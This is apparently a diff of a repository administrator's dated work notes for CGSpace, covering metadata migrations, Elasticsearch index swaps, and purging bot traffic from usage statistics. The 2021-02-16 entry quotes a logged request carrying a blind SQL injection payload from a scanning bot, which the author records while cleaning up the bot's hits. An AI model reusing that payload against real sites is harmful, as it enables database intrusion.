                                                                                                          -      6 fb76888c-03ae-4d53-b27d-87d7ca91371a
                                                                                                          -      6 ff42d1e6-c489-492c-a40a-803cabd901ed
                                                                                                          -      7 094e9e1d-09ff-40ca-a6b9-eca580936147
                                                                                                          -
                                                                                                            +
                                                                                                            $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | wc -l
                                                                                                            +30354
                                                                                                            +$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort -u | wc -l
                                                                                                            +18555
                                                                                                            +$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort | uniq -c | sort -h | tail
                                                                                                            +      5 c21a79e5-e24e-4861-aa07-e06703d1deb7
                                                                                                            +      5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
                                                                                                            +      5 d73fb3ae-9fac-4f7e-990f-e394f344246c
                                                                                                            +      5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
                                                                                                            +      5 dc50bcca-0abf-473f-8770-69d5ab95cc33
                                                                                                            +      5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
                                                                                                            +      6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
                                                                                                            +      6 fb76888c-03ae-4d53-b27d-87d7ca91371a
                                                                                                            +      6 ff42d1e6-c489-492c-a40a-803cabd901ed
                                                                                                            +      7 094e9e1d-09ff-40ca-a6b9-eca580936147
                                                                                                            +
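The three pipelines above (total rows, unique ids, most-repeated ids) can also be computed in one pass. A minimal sketch using only the standard library; the function name `id_stats` is hypothetical, and it assumes the export has an `id` column as in the `csvcut -c id` calls above.

```python
import csv
import io
from collections import Counter


def id_stats(csv_text):
    """Return (total rows, unique ids, {id: count} for ids seen more than once)."""
    reader = csv.DictReader(io.StringIO(csv_text))
    counts = Counter(row["id"] for row in reader)
    duplicated = {item_id: n for item_id, n in counts.items() if n > 1}
    return sum(counts.values()), len(counts), duplicated


# Tiny made-up export for illustration; real ids are UUIDs
sample = "id,dc.title\na,One\nb,Two\na,One again\na,One yet again\n"
total, unique, duplicated = id_stats(sample)
print(total, unique, duplicated)
```

For a real export, the text could be read with `open(path, newline="", encoding="utf-8").read()` or the reader could be pointed at the file object directly.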
                                                                                                            • I added a comment to that bug to ask if this is a side effect of the patch
                                                                                                            • I started tagging pre-2010 ILRI items with license information, as discussed with Peter and Abenet last week
                                                                                                                @@ -452,23 +452,23 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1
                                                                                                            -
                                                                                                            $ csvcut -c 'id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]' /tmp/2021-02-10-ILRI.csv | csvgrep -c 'dc.type[en_US]' -r '^.+[^(Journal Item|Journal Article|Book|Book Chapter)]'
                                                                                                            -
                                                                                                              +
                                                                                                              $ csvcut -c 'id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]' /tmp/2021-02-10-ILRI.csv | csvgrep -c 'dc.type[en_US]' -r '^.+[^(Journal Item|Journal Article|Book|Book Chapter)]'
                                                                                                              +
                                                                                                              • I imported the CSV into OpenRefine and converted the date text values to date types so I could facet by dates before 2010:
                                                                                                              -
                                                                                                              if(diff(value,"01/01/2010".toDate(),"days")<0, true, false)
                                                                                                              -
                                                                                                                +
                                                                                                                if(diff(value,"01/01/2010".toDate(),"days")<0, true, false)
                                                                                                                +
                                                                                                                • Then I filtered by publisher to make sure they were only ours:
                                                                                                                -
                                                                                                                or(
                                                                                                                -  value.contains("International Livestock Research Institute"),
                                                                                                                -  value.contains("ILRI"),
                                                                                                                -  value.contains("International Livestock Centre for Africa"),
                                                                                                                -  value.contains("ILCA"),
                                                                                                                -  value.contains("ILRAD"),
                                                                                                                -  value.contains("International Laboratory for Research on Animal Diseases")
                                                                                                                -)
                                                                                                                -
                                                                                                                  +
                                                                                                                  or(
                                                                                                                  +  value.contains("International Livestock Research Institute"),
                                                                                                                  +  value.contains("ILRI"),
                                                                                                                  +  value.contains("International Livestock Centre for Africa"),
                                                                                                                  +  value.contains("ILCA"),
                                                                                                                  +  value.contains("ILRAD"),
                                                                                                                  +  value.contains("International Laboratory for Research on Animal Diseases")
                                                                                                                  +)
                                                                                                                  +
                                                                                                                  • I tagged these pre-2010 items with “Other” if they didn’t already have a license
                                                                                                                  • I checked 2010 to 2015, and 2016 to date, but they were all tagged already!
                                                                                                                  • In the end I added the “Other” license to 1,523 items from before 2010
                                                                                                                  • @@ -496,7 +496,7 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1
                                                                                                                   en | 7601 | 0
                                                                                                                  (4 rows)
                                                                                                                  -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
                                                                                                                  +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
                                                                    • Start a full Discovery re-indexing on CGSpace
                                                                    @@ -504,8 +504,8 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
                                                                    • Clear the OpenRXV temp items index:
                                                                    -
                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                    -
                                                                      +
                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                      +
                                                                      • Then start a full harvesting of CGSpace in the AReS Explorer admin dashboard
                                                                      • Peter asked me about a few other recently submitted FEAST items that are restricted
                                                                          @@ -521,35 +521,35 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
                                                                      -
                                                                      $ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p 'fuuu' -f 43 -t 55
                                                                      -

                                                                      2021-02-15

                                                                      +
                                                                      $ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p 'fuuu' -f 43 -t 55
                                                                      +

                                                                      2021-02-15

                                                                      • Check the results of the AReS harvesting from last night:
                                                                      -
                                                                      $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                      -{
                                                                      -  "count" : 101126,
                                                                      -  "_shards" : {
                                                                      -    "total" : 1,
                                                                      -    "successful" : 1,
                                                                      -    "skipped" : 0,
                                                                      -    "failed" : 0
                                                                      -  }
                                                                      -}
                                                                      -
                                                                        +
                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                        +{
                                                                        +  "count" : 101126,
                                                                        +  "_shards" : {
                                                                        +    "total" : 1,
                                                                        +    "successful" : 1,
                                                                        +    "skipped" : 0,
                                                                        +    "failed" : 0
                                                                        +  }
                                                                        +}
                                                                        +
                                                                        • Set the current items index to read only and make a backup:
                                                                        -
                                                                        $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                        -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
                                                                        -
                                                                          +
                                                                          $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
                                                                          +
                                                                          • Delete the current items index and clone the temp one:
                                                                          -
                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                          -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-15'
                                                                          -
                                                                            +
                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                            +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-15'
                                                                            +
                                                                            • Call with Abdullah from CodeObia to discuss community and collection statistics reporting
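The index rotation from 2021-02-15 (block writes, clone to a dated backup, delete, clone the temp index into place, clean up) can be written down as an ordered plan. This is only a sketch: `rotation_steps` is a hypothetical helper that returns the requests without sending them, and it assumes the same index names and endpoints as the `curl` commands above.

```python
import json


def rotation_steps(index: str, temp: str, backup: str):
    """Return the (method, path, body) requests for swapping temp into index."""
    # Same settings payload the curl commands send before each clone.
    block_writes = json.dumps({"settings": {"index.blocks.write": True}})
    return [
        ("PUT", f"/{index}/_settings", block_writes),   # make current index read-only
        ("POST", f"/{index}/_clone/{backup}", None),    # back it up
        ("DELETE", f"/{index}", None),                  # drop the current index
        ("PUT", f"/{temp}/_settings", block_writes),    # make temp index read-only
        ("POST", f"/{temp}/_clone/{index}", None),      # clone temp into place
        ("DELETE", f"/{temp}", None),                   # remove temp
        ("DELETE", f"/{backup}", None),                 # remove the backup
    ]


for method, path, body in rotation_steps(
    "openrxv-items", "openrxv-items-temp", "openrxv-items-2021-02-15"
):
    print(method, path, body or "")
```

Keeping the plan as data makes it easy to review the order before running anything against Elasticsearch.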

                                                                            2021-02-16

                                                                            @@ -563,49 +563,49 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                          • They are definitely bots posing as users, as I see they have created six thousand DSpace sessions today:
                                                                          -
                                                                          $ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203' | sort | uniq | wc -l
                                                                          -4007
                                                                          -$ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231' | sort | uniq | wc -l
                                                                          -2128
                                                                          -
                                                                            +
                                                                            $ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203' | sort | uniq | wc -l
                                                                            +4007
                                                                            +$ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231' | sort | uniq | wc -l
                                                                            +2128
                                                                            +
                                                                            • Ah, actually 45.146.165.203 is making requests like this:
                                                                            -
                                                                            "http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%' AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND 'XzQO%'='XzQO"
                                                                            -
                                                                              +
                                                                              "http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%' AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND 'XzQO%'='XzQO"
                                                                              +
                                                                              • I purged the hits from these two using my check-spider-ip-hits.sh:
                                                                              -
                                                                              $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                              -Purging 4005 hits from 45.146.165.203 in statistics
                                                                              -Purging 3493 hits from 130.255.161.231 in statistics
                                                                              -
                                                                              -Total number of bot hits purged: 7498
                                                                              -
                                                                                +
                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                +Purging 4005 hits from 45.146.165.203 in statistics
                                                                                +Purging 3493 hits from 130.255.161.231 in statistics
                                                                                +
                                                                                +Total number of bot hits purged: 7498
                                                                                +
                                                                                • Ugh, I looked in Solr for the top IPs in 2021-01 and found a few more of these Russian IPs so I purged them too:
                                                                                -
                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                -Purging 27163 hits from 45.146.164.176 in statistics
                                                                                -Purging 19556 hits from 45.146.165.105 in statistics
                                                                                -Purging 15927 hits from 45.146.165.83 in statistics
                                                                                -Purging 8085 hits from 45.146.165.104 in statistics
                                                                                -
                                                                                -Total number of bot hits purged: 70731
                                                                                -
                                                                                  +
                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                  +Purging 27163 hits from 45.146.164.176 in statistics
                                                                                  +Purging 19556 hits from 45.146.165.105 in statistics
                                                                                  +Purging 15927 hits from 45.146.165.83 in statistics
                                                                                  +Purging 8085 hits from 45.146.165.104 in statistics
                                                                                  +
                                                                                  +Total number of bot hits purged: 70731
                                                                                  +
                                                                                  • My god, and 64.39.99.15 is from Qualys, the domain scanning security people, who are making queries trying to see if we are vulnerable or something (wtf?)
                                                                                    • Looking in Solr I see a few different IPs with DNS names like sn003.s02.iad01.qualys.com, so I will purge their requests too:
                                                                                  -
                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                  -Purging 3 hits from 130.255.161.231 in statistics
                                                                                  -Purging 16773 hits from 64.39.99.15 in statistics
                                                                                  -Purging 6976 hits from 64.39.99.13 in statistics
                                                                                  -Purging 13 hits from 64.39.99.63 in statistics
                                                                                  -Purging 12 hits from 64.39.99.65 in statistics
                                                                                  -Purging 12 hits from 64.39.99.94 in statistics
                                                                                  -
                                                                                  -Total number of bot hits purged: 23789
                                                                                  -

                                                                                  2021-02-17

                                                                                  +
                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                  +Purging 3 hits from 130.255.161.231 in statistics
                                                                                  +Purging 16773 hits from 64.39.99.15 in statistics
                                                                                  +Purging 6976 hits from 64.39.99.13 in statistics
                                                                                  +Purging 13 hits from 64.39.99.63 in statistics
                                                                                  +Purging 12 hits from 64.39.99.65 in statistics
                                                                                  +Purging 12 hits from 64.39.99.94 in statistics
                                                                                  +
                                                                                  +Total number of bot hits purged: 23789
                                                                                  +
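The session counts from 2021-02-16 could also be computed in Python. This is a rough sketch, not the method used above: `count_sessions` is a hypothetical helper, and unlike the `grep | sort | uniq` pipeline it counts distinct session IDs rather than distinct log lines, and it escapes the dots in the IP address.

```python
import re


def count_sessions(lines, ip: str) -> int:
    """Count distinct 32-character session IDs logged for one IP address."""
    # (?!\d) stops 45.146.165.20 from matching inside 45.146.165.203.
    pattern = re.compile(
        r"session_id=([A-Z0-9]{32}):ip_addr=" + re.escape(ip) + r"(?!\d)"
    )
    return len({m.group(1) for line in lines for m in pattern.finditer(line)})
```

To use it on a real log, pass an open file handle, for example `count_sessions(open("dspace.log.2021-02-16"), "45.146.165.203")`.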

                                                                                  2021-02-17

                                                                                  • I tested Node.js 10 vs 12 on CGSpace (linode18) and DSpace Test (linode26) and the build times were surprising
                                                                                      @@ -627,11 +627,11 @@ Purging 12 hits from 64.39.99.94 in statistics
                                                                                    • Abenet asked me to add Tom Randolph’s ORCID identifier to CGSpace
                                                                                    • I also tagged all his 247 existing items on CGSpace:
                                                                                    -
                                                                                    $ cat 2021-02-17-add-tom-orcid.csv 
                                                                                    -dc.contributor.author,cg.creator.id
                                                                                    -"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
                                                                                    -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                    -

                                                                                    2021-02-20

                                                                                    +
                                                                                    $ cat 2021-02-17-add-tom-orcid.csv 
                                                                                    +dc.contributor.author,cg.creator.id
                                                                                    +"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
                                                                                    +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                    +

                                                                                    2021-02-20

                                                                                    • Test the CG Core v2 migration on DSpace Test (linode26) one last time
                                                                                    @@ -640,17 +640,17 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace
                                                                                  • Start the CG Core v2 migration on CGSpace (linode18)
                                                                                  • After deploying the latest 6_x-prod branch and running migrate-fields.sh I started a full Discovery reindex:
                                                                                  -
                                                                                  $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                  -
                                                                                  -real    311m12.617s
                                                                                  -user    217m3.102s
                                                                                  -sys     2m37.363s
                                                                                  -
                                                                                    +
                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                    +
                                                                                    +real    311m12.617s
                                                                                    +user    217m3.102s
                                                                                    +sys     2m37.363s
                                                                                    +
                                                                                    • Then update OAI:
                                                                                    -
                                                                                    $ dspace oai import -c
                                                                                    -$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
                                                                                    -
                                                                                      +
                                                                                      $ dspace oai import -c
                                                                                      +$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
                                                                                      +
                                                                                      • Ben Hack was asking if there is a REST API query that will give him all ILRI outputs for their new Sharepoint intranet
                                                                                        • I told him he can try something like this if he only needs one collection, such as the ILRI articles in journals collection:
                                                                                        • @@ -668,16 +668,16 @@ $ export JAVA_OPTS=
                                                                                          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
                                                                                          -$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
                                                                                          -
                                                                                            +
                                                                                            $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
                                                                                            +$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
                                                                                            +
                                                                                            • The process took an hour or so!
                                                                                            • I added colorized output to the csv-metadata-quality tool and tagged version 0.4.4 on GitHub
                                                                                            • I updated the fields in AReS Explorer and then removed the old temp index so I can start a fresh re-harvest of CGSpace:
                                                                                            -
                                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                            -# start indexing in AReS
                                                                                            -

                                                                                            2021-02-22

                                                                                            +
                                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                            +# start indexing in AReS
                                                                                            +

                                                                                            2021-02-22

                                                                                            • Start looking at splitting the series name and number in dcterms.isPartOf now that we have migrated to CG Core v2
                                                                                                @@ -687,43 +687,43 @@ $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
                                                                                            -
                                                                                            localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                            -UPDATE 104
                                                                                            -
                                                                                              +
                                                                                              localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                              +UPDATE 104
                                                                                              +
                                                                                              • As for splitting the other values, I think I can export the dspace_object_id and text_value columns and then upload them as a CSV rather than writing a Python script to create the new metadata values
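For checking values outside the database, the trailing-semicolon cleanup done with `REGEXP_REPLACE` above can be reproduced with Python's `re.sub` using the same pattern. This is a small sketch; the function name and the sample series names are made up for illustration.

```python
import re


def strip_trailing_semicolon(value: str) -> str:
    """Remove a single trailing semicolon, leaving other semicolons alone."""
    return re.sub(r"^(.+?);$", r"\1", value)


print(strip_trailing_semicolon("Example Research Report;"))
print(strip_trailing_semicolon("Example Series; 12"))
```

Values that only contain a semicolon in the middle, such as a series name followed by a number, are returned unchanged, so they can still be split in a later step.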

                                                                                              2021-02-22

                                                                                              • Check the results of the AReS harvesting from last night:
                                                                                              -
                                                                                              $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                              -{
                                                                                              -  "count" : 101380,
                                                                                              -  "_shards" : {
                                                                                              -    "total" : 1,
                                                                                              -    "successful" : 1,
                                                                                              -    "skipped" : 0,
                                                                                              -    "failed" : 0
                                                                                              -  }
                                                                                              -}
                                                                                              -
                                                                                                +
                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                +{
                                                                                                +  "count" : 101380,
                                                                                                +  "_shards" : {
                                                                                                +    "total" : 1,
                                                                                                +    "successful" : 1,
                                                                                                +    "skipped" : 0,
                                                                                                +    "failed" : 0
                                                                                                +  }
                                                                                                +}
                                                                                                +
                                                                                                • Set the current items index to read only and make a backup:
                                                                                                -
                                                                                                $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
                                                                                                -
                                                                                                  +
                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
                                                                                                  +
                                                                                                  • Delete the current items index and clone the temp one to it:
                                                                                                  -
                                                                                                  $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                  -
                                                                                                    +
                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                    +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                    +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                    +
                                                                                                    • Then delete the temp and backup:
                                                                                                    -
                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                    -{"acknowledged":true}%
                                                                                                    -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-22'
                                                                                                    -

                                                                                                    +
                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                    +{"acknowledged":true}%
                                                                                                    +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-22'
                                                                                                    +
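The index swap above follows a fixed order: block writes, clone to a backup, delete, clone the temp index into place, then clean up. As a rough sketch only, the same sequence can be written as a dry-run plan in Python. The function name `index_swap_plan` and the `Request` alias are made up for illustration; the endpoints and index names are the ones used in the curl commands above, and nothing here sends a request.

```python
from typing import List, Optional, Tuple

# (HTTP method, URL, JSON body or None); hypothetical alias for this sketch
Request = Tuple[str, str, Optional[dict]]


def index_swap_plan(base: str, live: str, temp: str, backup: str) -> List[Request]:
    """Return the ordered requests for replacing `live` with `temp` (dry run only)."""
    block_writes = {"settings": {"index.blocks.write": True}}
    return [
        # 1. Make the live index read-only, then clone it to a backup.
        ("PUT", f"{base}/{live}/_settings", block_writes),
        ("POST", f"{base}/{live}/_clone/{backup}", None),
        # 2. Delete the live index and clone the (read-only) temp index into its place.
        ("DELETE", f"{base}/{live}", None),
        ("PUT", f"{base}/{temp}/_settings", block_writes),
        ("POST", f"{base}/{temp}/_clone/{live}", None),
        # 3. Remove the temp and backup indexes.
        ("DELETE", f"{base}/{temp}", None),
        ("DELETE", f"{base}/{backup}", None),
    ]


plan = index_swap_plan(
    "http://localhost:9200",
    "openrxv-items",
    "openrxv-items-temp",
    "openrxv-items-2021-02-22",
)
for method, url, body in plan:
    print(method, url, body if body is not None else "")
```

Printing the plan first makes it easier to check the order before running the destructive DELETE steps by hand.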

                                                                                                    2021-02-23

                                                                                                    • CodeObia sent a pull request for clickable countries on AReS
                                                                                                        @@ -732,22 +732,22 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                                                      • Remove semicolons from series names without numbers:
                                                                                                      -
                                                                                                      dspace=# BEGIN;
                                                                                                      -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                                      -UPDATE 104
                                                                                                      -dspace=# COMMIT;
                                                                                                      -
                                                                                                        +
                                                                                                        dspace=# BEGIN;
                                                                                                        +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                                        +UPDATE 104
                                                                                                        +dspace=# COMMIT;
                                                                                                        +
                                                                                                        • Set all text_lang values on CGSpace to en_US to make the series replacements easier (this didn’t work, read below):
                                                                                                        -
                                                                                                        dspace=# BEGIN;
                                                                                                        -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE text_lang !='en_US' AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                        -UPDATE 911
                                                                                                        -cgspace=# COMMIT;
                                                                                                        -
                                                                                                          +
                                                                                                          dspace=# BEGIN;
                                                                                                          +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE text_lang !='en_US' AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                          +UPDATE 911
                                                                                                          +cgspace=# COMMIT;
                                                                                                          +
                                                                                                          • Then export all series with their IDs to CSV:
                                                                                                          -
                                                                                                          dspace=# \COPY (SELECT dspace_object_id, text_value as "dcterms.isPartOf[en_US]" FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
                                                                                                          -
                                                                                                            +
                                                                                                            dspace=# \COPY (SELECT dspace_object_id, text_value as "dcterms.isPartOf[en_US]" FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
                                                                                                            +
                                                                                                            • In OpenRefine I trimmed and consolidated whitespace, then made some quick cleanups to normalize the fields based on a sanity check
                                                                                                              • For example many Spore items are like “Spore, Spore 23”
                                                                                                              • @@ -761,23 +761,23 @@ cgspace=# COMMIT;
                                                                                                            -
                                                                                                            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_value_id=5355845;
                                                                                                            -UPDATE 1
                                                                                                            -
                                                                                                              +
                                                                                                              dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_value_id=5355845;
                                                                                                              +UPDATE 1
                                                                                                              +
                                                                                                              • This also seems to work, using the id for just that one item:
                                                                                                              -
                                                                                                              dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id='9840d19b-a6ae-4352-a087-6d74d2629322';
                                                                                                              -UPDATE 37
                                                                                                              -
                                                                                                                +
                                                                                                                dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id='9840d19b-a6ae-4352-a087-6d74d2629322';
                                                                                                                +UPDATE 37
                                                                                                                +
                                                                                                                • This seems to work better for some reason:
                                                                                                                -
                                                                                                                dspacetest=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                                -UPDATE 18659
                                                                                                                -
                                                                                                                  +
                                                                                                                  dspacetest=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                                  +UPDATE 18659
                                                                                                                  +
                                                                                                                  • I split the CSV file into batches of 5,000 using xsv, then imported them one by one into CGSpace:
                                                                                                                  -
                                                                                                                  $ dspace metadata-import -f /tmp/0.csv
                                                                                                                  -
                                                                                                                    +
                                                                                                                    $ dspace metadata-import -f /tmp/0.csv
                                                                                                                    +
                                                                                                                    • It took FOREVER to import each file… like several hours each. MY GOD DSpace 6 is slow.
                                                                                                                    • Help Dominique Perera debug some issues with the WordPress DSpace importer plugin from Macaroni Bros
                                                                                                                        @@ -785,40 +785,40 @@ UPDATE 18659
                                                                                                                    -
                                                                                                                    104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] "GET /rest/communities?limit=1000 HTTP/1.1" 200 188779 "https://cgspace.cgiar.org/rest /communities?limit=1000" "RTB website BOT"
                                                                                                                    -104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] "GET /rest/communities//communities HTTP/1.1" 404 714 "https://cgspace.cgiar.org/rest/communities//communities" "RTB website BOT"
                                                                                                                    -
                                                                                                                      +
                                                                                                                      104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] "GET /rest/communities?limit=1000 HTTP/1.1" 200 188779 "https://cgspace.cgiar.org/rest /communities?limit=1000" "RTB website BOT"
                                                                                                                      +104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] "GET /rest/communities//communities HTTP/1.1" 404 714 "https://cgspace.cgiar.org/rest/communities//communities" "RTB website BOT"
                                                                                                                      +
                                                                                                                      • The first request is OK, but the second one is malformed for sure
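To spot requests like the second one in a larger log, one option is to flag any request path with an empty segment (a doubled slash). This is only a sketch: the regular expression and the helper name `has_empty_segment` are assumptions for illustration, and it looks only at the quoted request, not the referrer.

```python
import re

# Matches the quoted request ("METHOD path HTTP/x.y") in an access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[0-9.]+"')


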